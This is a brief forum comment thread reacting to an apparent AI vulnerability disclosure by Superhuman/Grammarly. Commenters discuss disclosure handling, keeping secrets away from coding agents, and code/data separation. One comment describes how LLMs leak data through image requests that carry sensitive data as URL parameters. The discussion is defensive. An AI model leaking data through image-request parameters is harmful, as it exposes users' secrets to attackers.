37 pointsby takira8 hours ago3 comments
  • sarelta8 hours ago
    I'm impressed Superhuman seems to have handled this so well - lots of big names are fumbling with AI vuln disclosures. Grammarly is not necessarily who I would have bet on to get it right
  • 0xferruccio4 hours ago
    The primary exfiltration vector for LLMs is making network requests via images with sensitive data as parameters.

    As Claude Code increasingly uses browser tools, we may need to move away from .env files to something encrypted, kind of like rails credentials, but without the secret key in the .env

    • SahAssar3 hours ago
      So you are going to take the untrusted tool that kept leaking your secrets, keep the secrets away from it but still use it to code the thing that uses the secrets? Are you actually reviewing the code it produces? In 99% of cases that's a "no" or a soft "sometimes".
  • djaouen2 hours ago
    Programming used to prevent this by separating code from data. AI (currently) has no such safeguards.